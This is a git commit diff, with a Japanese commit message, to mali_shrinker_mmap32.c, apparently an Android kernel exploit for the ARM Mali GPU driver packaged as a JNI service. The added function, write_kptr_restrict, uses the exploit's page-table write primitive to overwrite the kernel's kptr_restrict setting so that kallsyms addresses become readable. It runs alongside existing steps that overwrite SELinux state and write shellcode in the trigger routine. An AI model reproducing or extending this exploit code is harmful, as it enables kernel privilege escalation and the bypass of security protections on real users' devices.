kallsymsアドレスが読める処理を追加

Signed-off-by: yuu <[email protected]>

mali_shrinker_mmap32.c

@@ -729,7 +729,21 @@ void spray(int mali_fd) {
     }
 
 }
+static uint64_t kptr_restrict = 0x1147178;
+void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
+                   uint64_t* reserved) {
+  uint64_t kptr_restrict_addr =
+      (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t),
+           kptr_restrict_addr, atom_number++,
+           MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
+  usleep(300000);
+  // shellcode
+  write_data(mali_fd2, kptr_restrict, reserved,
+             TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0,
+             MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+}
 int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
   if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
     err(1, "Out of memory.");
@@ -775,10 +789,15 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
       uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
       LOG("Found pgd %d, %llx\n", pgd_idx, pgd);
       atom_number++;
+
       write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
+      usleep(100000);
+	  write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
       usleep(100000);
       write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));	
       usleep(100000);
+
+
       printf("time to run_enforce\n");
       run_enforce();      
       run_enforce_un();     
@@ -851,4 +870,4 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi
     }
     return -1;
 }
-#endif
+#endif